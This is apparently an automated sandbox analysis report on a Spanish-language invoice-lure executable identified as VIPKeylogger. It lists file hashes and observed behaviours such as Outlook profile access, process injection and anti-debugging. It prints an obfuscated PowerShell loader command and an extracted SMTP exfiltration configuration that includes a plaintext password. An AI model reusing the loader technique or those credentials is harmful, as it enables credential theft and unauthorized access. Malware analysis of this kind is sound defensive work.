Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 08:34
Static task
static1
Behavioral task
behavioral1
Sample
JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe
Resource
win10v2004-20241007-en
General
-
Target
JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe
-
Size
580KB
-
MD5
d344b966541bacdcd4e8df8487b8e5e9
-
SHA1
1e3d2286ede527fe7662c4fba9f2534c3ee129ef
-
SHA256
ebac7c8cd5045f76ed8f27f50eaa9c1734560bf4d9b398d81ab0ccd1c5af9e49
-
SHA512
c38716e6196505b83d5111ad1916f3efd13a60084eb7c123552b6c0ee68e0ec93e6219e58818272653c4c6ef178c502a62cf6c9ae31b211924d0c8c96d4689c1
-
SSDEEP
12288:1kuicZeIuXpkqtAb/N7sATEc+LKM4LK/mySMpQKz:NicgIDG04An+LKM4LjGnz
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
Processes:
msiexec.exeflow pid Process 23 4356 msiexec.exe 26 4356 msiexec.exe 28 4356 msiexec.exe 30 4356 msiexec.exe 32 4356 msiexec.exe 36 4356 msiexec.exe 38 4356 msiexec.exe 44 4356 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 35 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 4356 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 4640 powershell.exe 4356 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exepowershell.exemsiexec.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exemsiexec.exepid Process 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4640 powershell.exe 4356 msiexec.exe 4356 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 4640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
powershell.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 4640 powershell.exe Token: SeIncreaseQuotaPrivilege 4640 powershell.exe Token: SeSecurityPrivilege 4640 powershell.exe Token: SeTakeOwnershipPrivilege 4640 powershell.exe Token: SeLoadDriverPrivilege 4640 powershell.exe Token: SeSystemProfilePrivilege 4640 powershell.exe Token: SeSystemtimePrivilege 4640 powershell.exe Token: SeProfSingleProcessPrivilege 4640 powershell.exe Token: SeIncBasePriorityPrivilege 4640 powershell.exe Token: SeCreatePagefilePrivilege 4640 powershell.exe Token: SeBackupPrivilege 4640 powershell.exe Token: SeRestorePrivilege 4640 powershell.exe Token: SeShutdownPrivilege 4640 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeSystemEnvironmentPrivilege 4640 powershell.exe Token: SeRemoteShutdownPrivilege 4640 powershell.exe Token: SeUndockPrivilege 4640 powershell.exe Token: SeManageVolumePrivilege 4640 powershell.exe Token: 33 4640 powershell.exe Token: 34 4640 powershell.exe Token: 35 4640 powershell.exe Token: 36 4640 powershell.exe Token: SeDebugPrivilege 4356 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exepowershell.exedescription pid Process procid_target PID 4272 wrote to memory of 4640 4272 JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe 83 PID 4272 wrote to memory of 4640 4272 JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe 83 PID 4272 wrote to memory of 4640 4272 JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe 83 PID 4640 wrote to memory of 4356 4640 powershell.exe 96 PID 4640 wrote to memory of 4356 4640 powershell.exe 96 PID 4640 wrote to memory of 4356 4640 powershell.exe 96 PID 4640 wrote to memory of 4356 4640 powershell.exe 96 -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe"C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Studiepladsernes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Scourged.Afl';$Viljekraftens=$Studiepladsernes.SubString(11694,3);.$Viljekraftens($Studiepladsernes)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4356
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
346KB
MD55d3d1c39210847fc1d4ae76b2272a8f4
SHA188b4f7bba955a4eabaffea4689806b8d409be5ee
SHA25604588cf44f89229f0b94e58b3203909c53cfe076062c3bd1844268924c12d289
SHA512497df70f2bdb5c64ac5ab5d06486e1241cf58a76c9c4d501682e5c659d73ddd9bac15c8be45cc5e39021cdcf98592efa1c2aa02e4d1ccc42ae5911d29aecc085
-
Filesize
70KB
MD5daed86cf08d9bb9cd6ecb4738054b4bf
SHA1dccb735db3c40e005b405719a7e7fbffbabd4266
SHA256b2b48b891fda2d469556c1b554de00c8d6259e04749961ed80376d1f1b2976f0
SHA512f881ca1571ba0e4a770318865d176c1cb3ec1b842df11c12935617406c27abc308c24928ec3c0c1f3fb32c8947fd796e9c118ee04b3b279da36e3ecffd711c1c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82